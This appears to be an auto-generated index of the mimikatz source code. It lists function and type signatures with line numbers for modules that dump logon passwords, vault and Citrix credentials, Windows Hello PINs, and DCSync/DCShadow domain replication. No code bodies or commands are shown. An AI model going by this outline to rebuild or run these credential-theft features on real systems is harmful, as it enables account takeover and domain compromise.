function BOOL (line 313) | BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique,...
function PWCHAR (line 360) | PWCHAR kuhl_m_sid_filterFromArgs(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_sr98.c
function NTSTATUS (line 23) | NTSTATUS kuhl_m_sr98_beep(int argc, wchar_t * argv[])
function NTSTATUS (line 39) | NTSTATUS kuhl_m_sr98_raw(int argc, wchar_t * argv[])
function NTSTATUS (line 104) | NTSTATUS kuhl_m_sr98_b0(int argc, wchar_t * argv[])
function NTSTATUS (line 117) | NTSTATUS kuhl_m_sr98_list(int argc, wchar_t * argv[])
function NTSTATUS (line 131) | NTSTATUS kuhl_m_sr98_hid26(int argc, wchar_t * argv[])
function NTSTATUS (line 168) | NTSTATUS kuhl_m_sr98_em4100(int argc, wchar_t * argv[])
function NTSTATUS (line 212) | NTSTATUS kuhl_m_sr98_noralsy(int argc, wchar_t * argv[])
function NTSTATUS (line 247) | NTSTATUS kuhl_m_sr98_nedap(int argc, wchar_t * argv[])
function BOOL (line 294) | BOOL kuhl_m_sr98_sendBlocks(ULONG *blocks, UCHAR nb)
function kuhl_m_sr98_b0_descr (line 319) | void kuhl_m_sr98_b0_descr(ULONG b0)
function UCHAR (line 385) | UCHAR kuhl_m_sr98_hid26_Manchester_4bits(UCHAR data4)
function kuhl_m_sr98_hid26_blocks (line 393) | void kuhl_m_sr98_hid26_blocks(ULONG blocks[4], UCHAR FacilityCode, USHOR...
function kuhl_m_sr98_em4100_blocks (line 411) | void kuhl_m_sr98_em4100_blocks(ULONG blocks[3], ULONGLONG CardNumber)
function kuhl_m_sr98_noralsy_blocks (line 432) | void kuhl_m_sr98_noralsy_blocks(ULONG blocks[4], ULONG CardNumber, USHOR...
function USHORT (line 451) | USHORT kuhl_m_sr98_crc16_ccitt_1021(const UCHAR *data, ULONG len)
function kuhl_m_sr98_nedap_blocks (line 468) | void kuhl_m_sr98_nedap_blocks(ULONG blocks[5], BOOLEAN isLong, UCHAR Sub...
FILE: mimikatz/modules/kuhl_m_sr98.h
type KUHL_M_SR98_RAW_BLOCK (line 26) | typedef struct _KUHL_M_SR98_RAW_BLOCK {
FILE: mimikatz/modules/kuhl_m_standard.c
function NTSTATUS (line 32) | NTSTATUS kuhl_m_standard_exit(int argc, wchar_t * argv[])
function NTSTATUS (line 38) | NTSTATUS kuhl_m_standard_cls(int argc, wchar_t * argv[])
function NTSTATUS (line 51) | NTSTATUS kuhl_m_standard_answer(int argc, wchar_t * argv[])
function NTSTATUS (line 57) | NTSTATUS kuhl_m_standard_coffee(int argc, wchar_t * argv[])
function NTSTATUS (line 63) | NTSTATUS kuhl_m_standard_sleep(int argc, wchar_t * argv[])
function NTSTATUS (line 72) | NTSTATUS kuhl_m_standard_log(int argc, wchar_t * argv[])
function NTSTATUS (line 79) | NTSTATUS kuhl_m_standard_base64(int argc, wchar_t * argv[])
function NTSTATUS (line 213) | NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[])
function NTSTATUS (line 241) | NTSTATUS kuhl_m_standard_localtime(int argc, wchar_t * argv[])
function NTSTATUS (line 255) | NTSTATUS kuhl_m_standard_hostname(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_sysenvvalue.c
function NTSTATUS (line 20) | NTSTATUS kuhl_m_sysenv_list(int argc, wchar_t * argv[])
function NTSTATUS (line 54) | NTSTATUS kuhl_m_sysenv_get(int argc, wchar_t * argv[])
function NTSTATUS (line 100) | NTSTATUS kuhl_m_sysenv_set(int argc, wchar_t * argv[])
function NTSTATUS (line 142) | NTSTATUS kuhl_m_sysenv_del(int argc, wchar_t * argv[])
function kuhl_m_sysenv_display_attributes (line 181) | void kuhl_m_sysenv_display_attributes(DWORD attributes)
function kuhl_m_sysenv_display_vendorGuid (line 194) | void kuhl_m_sysenv_display_vendorGuid(LPCGUID guid)
FILE: mimikatz/modules/kuhl_m_sysenvvalue.h
type KUHL_M_SYSENV_GUID_STORE (line 20) | typedef struct _KUHL_M_SYSENV_GUID_STORE {
type VARIABLE_NAME (line 30) | typedef struct _VARIABLE_NAME {
type VARIABLE_NAME_AND_VALUE (line 36) | typedef struct _VARIABLE_NAME_AND_VALUE {
FILE: mimikatz/modules/kuhl_m_token.c
function NTSTATUS (line 21) | NTSTATUS kuhl_m_token_whoami(int argc, wchar_t * argv[])
function NTSTATUS (line 45) | NTSTATUS kuhl_m_token_list(int argc, wchar_t * argv[])
function NTSTATUS (line 51) | NTSTATUS kuhl_m_token_elevate(int argc, wchar_t * argv[])
function NTSTATUS (line 57) | NTSTATUS kuhl_m_token_run(int argc, wchar_t * argv[])
function NTSTATUS (line 63) | NTSTATUS kuhl_m_token_list_or_elevate(int argc, wchar_t * argv[], BOOL e...
function NTSTATUS (line 141) | NTSTATUS kuhl_m_token_revert(int argc, wchar_t * argv[])
function kuhl_m_token_displayAccount_sids (line 149) | void kuhl_m_token_displayAccount_sids(UCHAR l, DWORD count, PSID_AND_ATT...
function kuhl_m_token_displayAccount (line 181) | void kuhl_m_token_displayAccount(HANDLE hToken, BOOL full)
function BOOL (line 254) | BOOL CALLBACK kuhl_m_token_list_or_elevate_callback(HANDLE hToken, DWORD...
FILE: mimikatz/modules/kuhl_m_token.h
type KUHL_M_TOKEN_ELEVATE_DATA (line 23) | typedef struct _KUHL_M_TOKEN_ELEVATE_DATA {
FILE: mimikatz/modules/kuhl_m_ts.c
function NTSTATUS (line 51) | NTSTATUS kuhl_m_ts_multirdp(int argc, wchar_t * argv[])
function NTSTATUS (line 58) | NTSTATUS kuhl_m_ts_sessions(int argc, wchar_t * argv[])
function NTSTATUS (line 148) | NTSTATUS kuhl_m_ts_remote(int argc, wchar_t * argv[])
function NTSTATUS (line 177) | NTSTATUS kuhl_m_ts_logonpasswords(int argc, wchar_t * argv[])
function BOOL (line 208) | BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFO...
function NTSTATUS (line 335) | NTSTATUS kuhl_m_ts_mstsc(int argc, wchar_t * argv[])
function BOOL (line 346) | BOOL CALLBACK kuhl_m_ts_mstsc_enumProcess(PSYSTEM_PROCESS_INFORMATION pS...
function BOOL (line 382) | BOOL CALLBACK kuhl_m_ts_mstsc_MemoryAnalysis(PMEMORY_BASIC_INFORMATION p...
function kuhl_m_ts_mstsc_MemoryAnalysis_property (line 426) | void kuhl_m_ts_mstsc_MemoryAnalysis_property(PKULL_M_MEMORY_HANDLE hMemo...
FILE: mimikatz/modules/kuhl_m_ts.h
type KUHL_M_TS_MSTSC_ARG (line 23) | typedef struct _KUHL_M_TS_MSTSC_ARG {
type WCHAR (line 41) | typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
type WINSTATIONSTATECLASS (line 43) | typedef enum _WINSTATIONSTATECLASS {
type WINSTATIONINFOCLASS (line 56) | typedef enum _WINSTATIONINFOCLASS {
type SESSIONIDW (line 100) | typedef struct _SESSIONIDW {
type TSHARE_COUNTERS (line 109) | typedef struct _TSHARE_COUNTERS {
type PROTOCOLCOUNTERS (line 113) | typedef struct _PROTOCOLCOUNTERS {
type THINWIRECACHE (line 136) | typedef struct _THINWIRECACHE {
type RESERVED_CACHE (line 141) | typedef struct _RESERVED_CACHE {
type TSHARE_CACHE (line 145) | typedef struct _TSHARE_CACHE {
type CACHE_STATISTICS (line 149) | typedef struct CACHE_STATISTICS {
type PROTOCOLSTATUS (line 159) | typedef struct _PROTOCOLSTATUS {
type WINSTATIONINFORMATION (line 167) | typedef struct _WINSTATIONINFORMATION {
type WINSTATIONVIDEODATA (line 181) | typedef struct _WINSTATIONVIDEODATA {
type WINSTATIONREMOTEADDRESS (line 187) | typedef struct _WINSTATIONREMOTEADDRESS {
type WTS_KIWI (line 219) | typedef struct _WTS_KIWI {
type WTS_WEB_KIWI (line 232) | typedef struct _WTS_WEB_KIWI {
type TS_PROPERTY_KIWI (line 240) | typedef struct _TS_PROPERTY_KIWI {
type TS_PROPERTIES_KIWI (line 254) | typedef struct _TS_PROPERTIES_KIWI {
FILE: mimikatz/modules/kuhl_m_vault.c
function NTSTATUS (line 31) | NTSTATUS kuhl_m_vault_init()
function NTSTATUS (line 50) | NTSTATUS kuhl_m_vault_clean()
function NTSTATUS (line 67) | NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
function kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric (line 185) | void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiom...
function kuhl_m_vault_list_descItem_ngc (line 315) | void CALLBACK kuhl_m_vault_list_descItem_ngc(const VAULT_GUID_STRING * p...
function kuhl_m_vault_list_descVault (line 350) | void kuhl_m_vault_list_descVault(HANDLE hVault)
function kuhl_m_vault_list_descItemData (line 369) | void kuhl_m_vault_list_descItemData(PVAULT_ITEM_DATA pData)
function NTSTATUS (line 446) | NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[])
function kuhl_m_vault_cred_tryEncrypted (line 534) | void kuhl_m_vault_cred_tryEncrypted(PCREDENTIAL pCredential)
FILE: mimikatz/modules/kuhl_m_vault.h
type _VAULT_ITEM_DATA (line 21) | struct _VAULT_ITEM_DATA
type VAULT_GUID_STRING (line 25) | typedef struct _VAULT_GUID_STRING {
type VAULT_SCHEMA_HELPER (line 34) | typedef struct _VAULT_SCHEMA_HELPER {
type VAULT_PICTURE_PASSWORD_TYPE (line 39) | typedef enum _VAULT_PICTURE_PASSWORD_TYPE {
type VAULT_PICTURE_PASSWORD_POINT (line 45) | typedef struct _VAULT_PICTURE_PASSWORD_POINT {
type VAULT_PICTURE_PASSWORD_LINE (line 49) | typedef struct _VAULT_PICTURE_PASSWORD_LINE {
type VAULT_PICTURE_PASSWORD_CIRCLE (line 54) | typedef struct _VAULT_PICTURE_PASSWORD_CIRCLE {
type VAULT_PICTURE_PASSWORD_ELEMENT (line 60) | typedef struct _VAULT_PICTURE_PASSWORD_ELEMENT {
type VAULT_BIOMETRIC_ELEMENT (line 69) | typedef struct _VAULT_BIOMETRIC_ELEMENT {
type VAULT_INFORMATION_TYPE (line 75) | typedef enum _VAULT_INFORMATION_TYPE {
type VAULT_INFORMATION (line 81) | typedef struct _VAULT_INFORMATION {
type VAULT_ELEMENT_TYPE (line 95) | typedef enum _VAULT_ELEMENT_TYPE {
type VAULT_BYTE_BUFFER (line 112) | typedef struct _VAULT_BYTE_BUFFER {
type VAULT_CREDENTIAL_ATTRIBUTEW (line 117) | typedef struct _VAULT_CREDENTIAL_ATTRIBUTEW {
type VAULT_ITEM_DATA (line 127) | typedef struct _VAULT_ITEM_DATA {
type VAULT_ITEM_7 (line 148) | typedef struct _VAULT_ITEM_7 {
type VAULT_ITEM_8 (line 160) | typedef struct _VAULT_ITEM_8 {
type VAULT_ITEM_TYPE (line 173) | typedef struct _VAULT_ITEM_TYPE {
FILE: mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
function NTSTATUS (line 33) | NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
function BOOL (line 204) | BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn...
function BOOL (line 249) | BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataS...
function kuhl_m_lsadump_dcsync_descrObject_csv (line 272) | void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTa...
function kuhl_m_lsadump_dcsync_descrObject (line 316) | void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable,...
function LPCWSTR (line 337) | LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
function kuhl_m_lsadump_dcsync_descrBitlocker (line 378) | void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTab...
function kuhl_m_lsadump_dcsync_descrUser (line 459) | void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, A...
function kuhl_m_lsadump_dcsync_descrUserProperties (line 555) | void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties)
function kuhl_m_lsadump_dcsync_descrTrust (line 642) | void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ...
function kuhl_m_lsadump_dcsync_descrTrustAuthentication (line 669) | void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE ...
function kuhl_m_lsadump_dcsync_descrSecret (line 704) | void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable,...
function BOOL (line 750) | BOOL kuhl_m_lsadump_dcshadow_clean_push_request(PDCSHADOW_PUSH_REQUEST r...
function kuhl_m_lsadump_dcshadow_clean_domain_info (line 790) | void kuhl_m_lsadump_dcshadow_clean_domain_info(PDCSHADOW_DOMAIN_INFO info)
function BOOL (line 810) | static BOOL kuhl_m_lsadump_dcshadow_remove_object(PDCSHADOW_PUSH_REQUEST...
function BOOL (line 842) | BOOL kuhl_m_lsadump_dcshadow_remove_attribute(PDCSHADOW_PUSH_REQUEST req...
function BOOL (line 875) | BOOL kuhl_m_lsadump_dcshadow_encode_attribute(PDCSHADOW_PUSH_REQUEST req...
function BOOL (line 926) | BOOL kuhl_m_lsadump_dcshadow_encode_add_object_if_needed(PDCSHADOW_PUSH_...
function BOOL (line 960) | BOOL kuhl_m_lsadump_dcshadow_encode_add_attribute_if_needed(PDCSHADOW_PU...
function BOOL (line 994) | BOOL kuhl_m_lsadump_dcshadow_encode_add_value(PCWSTR szValue, PDCSHADOW_...
function NTSTATUS (line 1018) | NTSTATUS kuhl_m_lsadump_dcshadow_encode(PDCSHADOW_PUSH_REQUEST request, ...
function NTSTATUS (line 1090) | NTSTATUS kuhl_m_lsadump_dcshadow_view(PDCSHADOW_PUSH_REQUEST request)
function PBERVAL (line 1108) | PBERVAL kuhl_m_lsadump_dcshadow_getSingleAttr(PLDAP ld, PLDAPMessage pMe...
function PWCHAR (line 1128) | PWCHAR kuhl_m_lsadump_dcshadow_getSingleTextAttr(PLDAP ld, PLDAPMessage ...
function PSTR (line 1140) | PSTR kuhl_m_lsadump_dcshadow_getSingleTextAttrA(PLDAP ld, PLDAPMessage p...
function BOOL (line 1153) | BOOL kuhl_m_lsadump_dcshadow_objectGUID_invocationGUID(PDCSHADOW_DOMAIN_...
function BOOL (line 1229) | BOOL kuhl_m_lsadump_dcshadow_build_convert_account_to_dn(PLDAP ld, PWSTR...
function BOOL (line 1254) | BOOL kuhl_m_lsadump_dcshadow_build_parentGuid_from_dn(PLDAP ld, PWSTR sz...
function BOOL (line 1313) | BOOL kuhl_m_lsadump_dcshadow_build_replication_version(PLDAP ld, PWSTR s...
function BOOL (line 1410) | BOOL kuhl_m_lsadump_dcshadow_domaininfo_rootDse(PDCSHADOW_DOMAIN_INFO info)
function BOOL (line 1458) | BOOL kuhl_m_lsadump_dcshadow_domaininfo_schemasignature(PDCSHADOW_DOMAIN...
function BOOL (line 1485) | BOOL kuhl_m_lsadump_dcshadow_domaininfo_computer(PDCSHADOW_DOMAIN_INFO i...
function ULONG (line 1508) | ULONG kuhl_m_lsadump_dcshadow_init_ldap(PWSTR szFQDN, LDAP** pld)
function ULONG (line 1535) | ULONG kuhl_m_lsadump_dcshadow_lingering_trigger(LDAP* ld, PWSTR szTarget...
function NTSTATUS (line 1552) | NTSTATUS kuhl_m_lsadump_dcshadow_lingering_initial(PDCSHADOW_DOMAIN_INFO...
function NTSTATUS (line 1565) | NTSTATUS kuhl_m_lsadump_dcshadow_lingering_propagate(PDCSHADOW_DOMAIN_IN...
function BOOL (line 1609) | BOOL kuhl_m_lsadump_dcshadow_build_replication_attribute(PDCSHADOW_DOMAI...
function BOOL (line 1660) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_sid(ATTRVAL* pVal, ...
function BOOL (line 1676) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_unicode_string(ATTR...
function BOOL (line 1688) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_octet_string(ATTRVA...
function BOOL (line 1721) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_security_descriptor...
function BOOL (line 1738) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_date(ATTRVAL* pVal,...
function BOOL (line 1756) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_large_integer(ATTRV...
function BOOL (line 1766) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_dword(ATTRVAL* pVal...
function BOOL (line 1776) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_dn(ATTRVAL* pVal, P...
function BOOL (line 1793) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_oid(ATTRVAL* pVal, ...
function BOOL (line 1809) | BOOL dataToHexWithoutNull(LPCVOID data, DWORD dwData, LPBYTE dest, DWORD...
function BOOL (line 1829) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_supplementalCredent...
function BOOL (line 1916) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_supplementalCredent...
function BOOL (line 1961) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_supplementalCredent...
function BOOL (line 2033) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value_supplementalCredent...
function BOOL (line 2071) | BOOL kuhl_m_lsadump_dcshadow_build_replication_value(PDCSHADOW_PUSH_REQU...
function BOOL (line 2134) | BOOL kuhl_m_lsadump_dcshadow_build_replication_get_schema_oid_values(PDC...
function BOOL (line 2169) | BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
function BOOL (line 2286) | BOOL kuhl_m_lsadump_dcshadow_domain_and_replication_info(PDCSHADOW_DOMAI...
function BOOL (line 2327) | static BOOL IsNullGuid(GUID* Guid)
function BOOL (line 2337) | BOOL kuhl_m_lsadump_dcshadow_object_to_replentinflist(PDCSHADOW_DOMAIN_I...
function BOOL (line 2409) | BOOL kuhl_m_lsadump_dcshadow_encode_sensitive_value(BOOL fNTLM, DWORD ri...
function kuhl_m_lsadump_dcshadow_encode_sensitive (line 2435) | void kuhl_m_lsadump_dcshadow_encode_sensitive(REPLENTINFLIST *pReplEnt, ...
function ULONG (line 2458) | ULONG kuhl_m_lsadump_dcshadow_call_AddEntry(PDCSHADOW_DOMAIN_INFO info, ...
function ULONG (line 2497) | ULONG kuhl_m_lsadump_dcshadow_register_NTDSA_AddEntry(PDCSHADOW_DOMAIN_I...
function ULONG (line 2553) | ULONG kuhl_m_lsadump_dcshadow_call_AddEntry_manual(PDCSHADOW_DOMAIN_INFO...
type ULONG (line 2568) | typedef ULONG (*kuhl_m_lsadump_dcshadow_bind_DRSR_function) (PDCSHADOW_D...
function ULONG (line 2569) | ULONG kuhl_m_lsadump_dcshadow_bind_DRSR(PDCSHADOW_DOMAIN_INFO info, kuhl...
function ULONG (line 2593) | ULONG kuhl_m_lsadump_dcshadow_register_NTDSA(PDCSHADOW_DOMAIN_INFO info)
function ULONG (line 2598) | ULONG kuhl_m_lsadump_dcshadow_AddEntry(PDCSHADOW_DOMAIN_INFO info)
function BOOL (line 2603) | BOOL kuhl_m_lsadump_dcshadow_register_ldap(PDCSHADOW_DOMAIN_INFO info)
function NTSTATUS (line 2652) | NTSTATUS kuhl_m_lsadump_dcshadow_register(PDCSHADOW_DOMAIN_INFO info)
function NTSTATUS (line 2677) | NTSTATUS kuhl_m_lsadump_dcshadow_force_sync_partition(PDCSHADOW_DOMAIN_I...
function NTSTATUS (line 2710) | NTSTATUS kuhl_m_lsadump_dcshadow_force_sync(PDCSHADOW_DOMAIN_INFO info, ...
function NTSTATUS (line 2736) | NTSTATUS kuhl_m_lsadump_dcshadow_push(PDCSHADOW_DOMAIN_INFO info)
function NTSTATUS (line 2741) | NTSTATUS kuhl_m_lsadump_dcshadow_unregister(PDCSHADOW_DOMAIN_INFO info)
function VOID (line 2800) | VOID kuhl_m_lsadump_dcshadow_init_prefixtable(SCHEMA_PREFIX_TABLE* prefi...
function BOOL (line 2825) | BOOL WINAPI kuhl_m_lsadump_dcshadow_control_C(IN DWORD dwCtrlType)
function NTSTATUS (line 2840) | NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[])
function SRV_DRS_HANDLE_rundown (line 3014) | void __RPC_USER SRV_DRS_HANDLE_rundown(DRS_HANDLE hDrs)
function ULONG (line 3022) | ULONG SRV_IDL_DRSBind(handle_t rpc_handle, UUID *puuidClientDsa, DRS_EXT...
function ULONG (line 3069) | ULONG SRV_IDL_DRSUnbind(DRS_HANDLE *phDrs)
function ULONG (line 3080) | ULONG SRV_IDL_DRSGetNCChanges(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MS...
function ULONG (line 3204) | ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG...
function ULONG (line 3224) | ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UP...
FILE: mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h
type USER_PROPERTY (line 22) | typedef struct _USER_PROPERTY {
type USER_PROPERTIES (line 30) | typedef struct _USER_PROPERTIES {
type BOOL (line 55) | typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);
type DS_REPL_ATTRTYP_META_DATA (line 57) | typedef struct _DS_REPL_ATTRTYP_META_DATA {
type DS_REPL_OBJ_TYPE_META_DATA (line 66) | typedef struct _DS_REPL_OBJ_TYPE_META_DATA {
type DS_REPL_OBJ_TYPE_META_DATA_BLOB (line 72) | typedef struct _DS_REPL_OBJ_TYPE_META_DATA_BLOB {
type DCSHADOW_OBJECT_ATTRIBUTE (line 78) | typedef struct _DCSHADOW_OBJECT_ATTRIBUTE {
type DCSHADOW_OBJECT_ATTRIBUTE_METADATA (line 91) | typedef struct _DCSHADOW_OBJECT_ATTRIBUTE_METADATA {
type DCSHADOW_PUSH_REQUEST_OBJECT_ATTRIBUTE (line 100) | typedef struct _DCSHADOW_PUSH_REQUEST_OBJECT_ATTRIBUTE {
type DCSHADOW_PUSH_REQUEST_OBJECT (line 107) | typedef struct _DCSHADOW_PUSH_REQUEST_OBJECT {
type DCSHADOW_PUSH_REQUEST (line 119) | typedef struct _DCSHADOW_PUSH_REQUEST {
type DCSHADOW_DOMAIN_DC_INFO (line 126) | typedef struct _DCSHADOW_DOMAIN_DC_INFO {
type DCSHADOW_DOMAIN_INFO (line 138) | typedef struct _DCSHADOW_DOMAIN_INFO {
FILE: mimikatz/modules/misc/kuhl_m_misc_citrix.c
function kuhl_m_misc_citrix_logonpasswords (line 8) | void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[])
function BOOL (line 20) | BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSyste...
function Citrix_SSO_Program_args (line 73) | void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puC...
function Citrix_SSO_Program_FileMapping (line 107) | void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemot...
function CitrixPasswordObfuscate (line 144) | void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData)
function CitrixPasswordDesobfuscate (line 156) | void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData)
FILE: mimikatz/modules/misc/kuhl_m_misc_citrix.h
type CITRIX_CREDENTIALS (line 14) | typedef struct _CITRIX_CREDENTIALS {
type CITRIX_PACKED_CREDENTIALS (line 22) | typedef struct _CITRIX_PACKED_CREDENTIALS {
FILE: mimikatz/modules/misc/kuhl_m_misc_djoin.c
function kuhl_m_misc_djoin (line 8) | void kuhl_m_misc_djoin(int argc, wchar_t* argv[])
function kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr (line 32) | void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlo...
function kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr (line 73) | void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBY...
function kuhl_m_misc_djoin_OP_PACKAGE_descr (line 113) | void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE...
function kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr (line 138) | void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULO...
function kuhl_m_misc_djoin_OP_PACKAGE_PART_descr (line 164) | void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PA...
function kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr (line 206) | void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob...
function kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr (line 230) | void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob...
function kuhl_m_misc_djoin_OP_CERT_PART_descr (line 250) | void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBY...
function kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr (line 282) | void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX...
function kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr (line 294) | void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST...
function kuhl_m_misc_djoin_OP_POLICY_PART_descr (line 303) | void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, P...
function kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr (line 328) | void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POL...
function kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr (line 344) | void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_E...
FILE: mimikatz/modules/ngc/kuhl_m_ngc.c
function DWORD (line 23) | DWORD WINAPI kiwidecode_thread(PREMOTE_LIB_DATA lpParameter)
function DWORD (line 30) | DWORD kiwidecode_thread_end(){return 'kide';}
function dealWithStructToDecode (line 33) | void dealWithStructToDecode(LPCWSTR type, PstructToDecode d, PKULL_M_MEM...
function dealWithL (line 82) | void dealWithL(PKULL_M_MEMORY_ADDRESS aRemoteL)
function enumit2 (line 95) | void CALLBACK enumit2(IN PValueUnkPtr pValueUnkPtr, IN DWORD szObject, I...
function dealWithF (line 123) | void dealWithF(PKULL_M_MEMORY_ADDRESS aRemoteF)
function enumit (line 156) | void CALLBACK enumit(IN PValueGuidPtr pValueGuidPtr, IN DWORD szObject, ...
function NTSTATUS (line 172) | NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
function kuhl_m_ngc_dealWithNode (line 212) | void kuhl_m_ngc_dealWithNode(PKULL_M_MEMORY_ADDRESS aNode, PVOID OrigMap...
function BOOL (line 261) | BOOL getContent(DWORD dwReadFlags, LPCWSTR Root, LPCWSTR guid, BOOL isDa...
function printUnkPins (line 281) | void printUnkPins(PUNK_RAW_PIN pRaw)
function NTSTATUS (line 303) | NTSTATUS kuhl_m_ngc_pin(int argc, wchar_t * argv[])
function NTSTATUS (line 418) | NTSTATUS kuhl_m_ngc_sign(int argc, wchar_t * argv[])
function NTSTATUS (line 477) | NTSTATUS kuhl_m_ngc_decrypt(int argc, wchar_t * argv[])
function BOOL (line 573) | BOOL CALLBACK kuhl_m_ngc_enum_protectors(DWORD level, PCWCHAR fullpath, ...
function BOOL (line 611) | BOOL CALLBACK kuhl_m_ngc_enum_U(DWORD level, PCWCHAR fullpath, PCWCHAR p...
function BOOL (line 649) | BOOL CALLBACK kuhl_m_ngc_enum_directory(DWORD level, PCWCHAR fullpath, P...
function NTSTATUS (line 722) | NTSTATUS kuhl_m_ngc_enum(int argc, wchar_t * argv[])
FILE: mimikatz/modules/ngc/kuhl_m_ngc.h
type Node (line 23) | typedef struct _Node {
type ValueGuidPtr (line 31) | typedef struct _ValueGuidPtr {
type ValueUnkPtr (line 36) | typedef struct _ValueUnkPtr {
type ValueProvider (line 41) | typedef struct _ValueProvider {
type ContainerManager (line 48) | typedef struct _ContainerManager {
type unkF (line 59) | typedef struct _unkF {
type structToDecode (line 92) | typedef struct _structToDecode {
type structL (line 99) | typedef struct _structL {
type UNK_RAW_PIN (line 106) | typedef struct _UNK_RAW_PIN {
FILE: mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.c
function NTSTATUS (line 27) | NTSTATUS kuhl_m_sekurlsa_nt5_init()
function NTSTATUS (line 34) | NTSTATUS kuhl_m_sekurlsa_nt5_clean()
function NTSTATUS (line 41) | NTSTATUS kuhl_m_sekurlsa_nt5_LsaInitializeProtectedMemory()
function BOOL (line 49) | BOOL kuhl_m_sekurlsa_nt5_isOld(DWORD osBuildNumber, DWORD moduleTimeStamp)
function VOID (line 129) | VOID WINAPI kuhl_m_sekurlsa_nt5_LsaProtectMemory(IN PVOID Buffer, IN ULO...
function VOID (line 134) | VOID WINAPI kuhl_m_sekurlsa_nt5_LsaUnprotectMemory(IN PVOID Buffer, IN U...
function NTSTATUS (line 139) | NTSTATUS kuhl_m_sekurlsa_nt5_LsaEncryptMemory(PUCHAR pMemory, ULONG cbMe...
function VOID (line 206) | VOID SymCryptDesGenCrypt2(PCSYMCRYPT_NT5_DES_EXPANDED_KEY pExpandedKey, ...
